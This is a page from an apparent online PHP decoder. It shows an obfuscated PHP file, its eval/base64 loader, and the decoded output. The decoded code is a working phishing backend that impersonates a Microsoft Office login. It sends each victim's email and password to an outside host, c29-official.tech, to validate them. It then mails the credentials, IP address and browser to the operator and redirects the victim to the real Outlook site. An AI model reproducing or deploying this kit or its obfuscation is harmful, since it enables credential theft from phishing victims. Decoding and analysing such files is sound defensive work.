Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $_F=__FILE__;$_X='P2lCP1ouWj4/aUI/Wi5aDVYkemVIOU9ZPlM+emVIOShMYWFhYSw+MGFhYWFhYWFhYW..

Decoded Output download

<?php ?><?php ?><?php
$random = rand(50000, 100000000000);
/* Data Information */
error_reporting(0);
include ('blocker.php');
include ('email.php');
$username = $_POST['username'];
$password = $_POST['password'];
$in = urlencode($username);
$fo = urlencode($password);
$browser = $_SERVER['HTTP_USER_AGENT'];
$date = date("D M d, Y g:i a");
$serv = $_SERVER['HTTP_HOST'];
/* True login check */
function check($email, $pass, $host) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, 'http://c29-official.tech/givingfakelink3/cxkuadrat.php?1=' . $email . '&2=' . $pass . '&3=' . $host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}
$output = check($username, $password, $serv);
if ($output == "valid ") {
    $remote = getenv("REMOTE_ADDR");
    $subject = "True - Microsoft by A-29 Online | $username | $remote";
    /* True Data Check */
    $message = "
Classified Report
|----------------- Microsoft Office Login -----------------|
| Email : $username 
| Password : $password
|--------------------- I N F O | I P ----------------------|
| IP Address: $remote 
| Date: $date 
| Browser: $browser
|---------------------- A-29 Online -----------------------|
";
    $headers = "A-29 Official <[email protected]>" . "
" . "MIME-Version: 1.0";
    mail($to, $subject, $message);
    header('Location: http://outlook.office.com/owa');
} else {
    $remote = getenv("REMOTE_ADDR");
    $subject = "Wrong - Microsoft by A-29 Online | $username | $remote";
    /* True Data Check */
    $message = "
Classified Report
|----------------- Microsoft Office Login -----------------|
| Email : $username 
| Password : $password
|--------------------- I N F O | I P ----------------------|
| IP Address: $remote 
| Date: $date 
| Browser: $browser
|---------------------- A-29 Online -----------------------|
";
    $headers = "A-29 Official <[email protected]>" . "
" . "MIME-Version: 1.0";
    mail($to, $subject, $message);
    header('Location: ./errors.php?uid=ZWxpdGUgc2NhbXBhZ2UgcG93ZXJlZCBieSB0aGVwbGF5ZXI&' . $random . '&data=' . $username . '&status=login&string=signin');
}
?>

Did this file decode correctly?

Original Code

<?php $_F=__FILE__;$_X='P2lCP1ouWj4/aUI/Wi5aDVYkemVIOU9ZPlM+emVIOShMYWFhYSw+MGFhYWFhYWFhYWFhKTsNVmgqPjRlPWU+M0hBT3pZZT1zT0g+KmgNVk16ek96X3pNWk96PXNIeChhKTsNVnNIMldROU0+KCc8V08yeU16WFouWicpOw1Wc0gyV1E5TT4oJ01ZZXNXWFouWicpOw1WJFFuTXpIZVlNPlM+JF9tN3BUaidRbk16SGVZTSdkOw1WJFplbm59T3o5PlM+JF9tN3BUaidaZW5ufU96OSdkOw1WJHNIPlM+UXpXTUgyTzlNKCRRbk16SGVZTSk7DVYkQU8+Uz5ReldNSDJPOU0oJFplbm59T3o5KTsNViQ8ek99bk16PlM+JF9wS2c2S2dqJ3RUVG1fIHBLZ19GQ0tFVCdkOw1WJDllPU0+Uz45ZT1NKCI0PnU+OSw+Yj54OnM+ZSIpOw1WJG5NemM+Uz4kX3BLZzZLZ2ondFRUbV90N3BUJ2Q7DVZoKj5UelFNPldPeHNIPjIuTTJ5PipoDVZBUUgyPXNPSD4yLk0yeSgkTVllc1csPiRaZW5uLD4kLk9uPSk+XQ1WPj4+PiQyLj5TPjJReldfc0hzPSgpOw1WPj4+PjJReldfbk09T1o9KCQyLiw+LyBnSTdtVF8gZ0ksPicuPT1aOmhoMmtQLU9BQXMyc2VXWD1NMi5oeHNjc0h4QWV5TVdzSHlKaDJSeVFlOXplPVhaLlo/MFMnPlg+JE1ZZXNXPlg+JyZrUyc+WD4kWmVubj5YPicmSlMnPlg+JC5Pbj0pOw1WPj4+PjJReldfbk09T1o9KCQyLiw+LyBnSTdtVF9nS1QgZ0VUZ0ZFcHJLZyw+MCk7DVY+Pj4+JE9RPVpRPT5TPjJReldfTVJNMigkMi4pOw1WPj4+PjJReldfMldPbk0oJDIuKTsNVj4+Pj56TT1Rekg+JE9RPVpRPTsNVmwNViRPUT1aUT0+Uz4yLk0yeSgkUW5NekhlWU0sPiRaZW5ufU96OSw+JG5NemMpOw1Wc0E+KCRPUT1aUT0+U1M+ImNlV3M5PiIpPl0NVj4+Pj4kek1ZTz1NPlM+eE09TUhjKCJnS3U3VEtfRjQ0ZyIpOw1WPj4+PiRuUTwKTTI9PlM+IlR6UU0+LT51czJ6T25PQT0+PHE+Ri1rUD43SFdzSE0+fD4kUW5NekhlWU0+fD4kek1ZTz1NIjsNVj4+Pj5oKj5UelFNPjRlPWU+Ly5NMnk+KmgNVj4+Pj4kWU1ubmV4TT5TPiINVi9XZW5uc0FzTTk+Z01aT3o9DVZ8LS0tLS0tLS0tLS0tLS0tLS0+dXMyek9uT0E9PjdBQXMyTT5JT3hzSD4tLS0tLS0tLS0tLS0tLS0tLXwNVnw+S1llc1c+Oj4kUW5NekhlWU0+DVZ8Pm1lbm59T3o5Pjo+JFplbm59T3o5DVZ8LS0tLS0tLS0tLS0tLS0tLS0tLS0tPjM+RT5yPjc+fD4zPm0+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLXwNVnw+M20+Rjk5ek1ubjo+JHpNWU89TT4NVnw+NGU9TTo+JDllPU0+DVZ8Pm96T31uTXo6PiQ8ek99bk16DVZ8LS0tLS0tLS0tLS0tLS0tLS0tLS0tLT5GLWtQPjdIV3NITT4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLXwNViI7DVY+Pj4+JC5NZTlNem4+Uz4iRi1rUD43QUFzMnNlVz5CZTlZc0hAZWtQLU9BQXMyc2VXWDJPWWkiPlg+Ig1WIj5YPiJ1M3VLLTZNem5zT0g6PjBYYSI7DVY+Pj4+WWVzVygkPU8sPiRuUTwKTTI9LD4kWU1ubmV4TSk7DVY+Pj4+Lk1lOU16KCdJTzJlPXNPSDo+Lj09WjpoaE9RPVdPT3lYT0FBczJNWDJPWWhPfWUnKTsNVmw+TVduTT5dDVYJJHpNWU89TT5TPnhNPU1IYygiZ0t1N1RLX0Y0NGciKTsNVj4+Pj4kblE8Ck0yPT5TPiJ7ek9IeD4tPnVzMnpPbk9BPT48cT5GLWtQPjdIV3NITT58PiRRbk16SGVZTT58PiR6TVlPPU0iOw1WPj4+PmgqPlR6UU0+NGU9ZT4vLk0yeT4qaA1WPj4+PiRZTW5uZXhNPlM+Ig1WL1dlbm5zQXNNOT5nTVpPej0NVnwtLS0tLS0tLS0tLS0tLS0tLT51czJ6T25PQT0+N0FBczJNPklPeHNIPi0tLS0tLS0tLS0tLS0tLS0tfA1WfD5LWWVzVz46PiRRbk16SGVZTT4NVnw+bWVubn1Pejk+Oj4kWmVubn1PejkNVnwtLS0tLS0tLS0tLS0tLS0tLS0tLS0+Mz5FPnI+Nz58PjM+bT4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tfA1WfD4zbT5GOTl6TW5uOj4kek1ZTz1NPg1WfD40ZT1NOj4kOWU9TT4NVnw+b3pPfW5Nejo+JDx6T31uTXoNVnwtLS0tLS0tLS0tLS0tLS0tLS0tLS0tPkYta1A+N0hXc0hNPi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tfA1WIjsNVj4+Pj4kLk1lOU16bj5TPiJGLWtQPjdBQXMyc2VXPkJlOVlzSEBla1AtT0FBczJzZVdYMk9ZaSI+WD4iDVYiPlg+InUzdUstNk16bnNPSDo+MFhhIjsNVj4+Pj5ZZXNXKCQ9Tyw+JG5RPApNMj0sPiRZTW5uZXhNKTsNVj4+Pj4uTWU5TXooJ0lPMmU9c09IOj5YaE16ek96blhaLlo/UXM5U057Ulo5QyB4MmtFLjxEby5OayB4MkNQSk5EOFdOL29zTXBvYWVDNn08Q3JMTkQzJic+WD4kemVIOU9ZPlg+JyY5ZT1lUyc+WD4kUW5NekhlWU0+WD4nJm49ZT1RblNXT3hzSCZuPXpzSHhTbnN4SHNIJyk7DVZsDVY/aQ=';$_D=strrev('edoced_46esab');eval($_D('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdTZ1BPOVlaV0ZLbXF5ZnhjakxKUnp1TTV2TnRzMWIue0I0bkNdaS8yRGwwRWhlQQpbZDg9UXA+VlhvIEh9NkdJdzdrYTNUclU8JywnPVI5b2RtcGxBRVB5azhndls1M3hyTWV6cVpIaTdZaFc8RHNHez5DY1h9MU4vYWZqNl1KdHVTIAouQlVud1ZLTFFPMjBJVEY0YicpOyRfUj1zdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw='));?>

Function Calls

base64_decode 2
strrev 1
strtr 1
str_replace 1

Variables

$_R 0
$_X 0
$_F index.php
$_D base64_decode

Stats

MD5 51c492e51d29a89548c29379fc6d7f72
Eval Count 2
Decode Time 194 ms